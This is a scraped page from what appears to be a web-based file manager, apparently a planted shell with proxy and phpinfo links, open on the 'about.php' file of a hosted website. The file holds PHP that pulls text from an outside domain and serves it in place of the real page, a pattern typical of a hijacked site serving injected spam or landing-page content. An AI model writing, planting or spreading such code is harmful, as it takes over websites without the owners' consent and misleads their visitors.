File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/blossomkasauli.com/about.php
Back
<?php $url = "https://ampbaruwe.online/lp/lp2.txt"; function fetch_html($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 10, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => "Mozilla/5.0" ]); $data = curl_exec($ch); curl_close($ch); return $data; } else { return @file_get_contents($url); } } $html = fetch_html($url); if (!$html) { echo "Gagal mengambil konten."; exit; } echo $html;
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings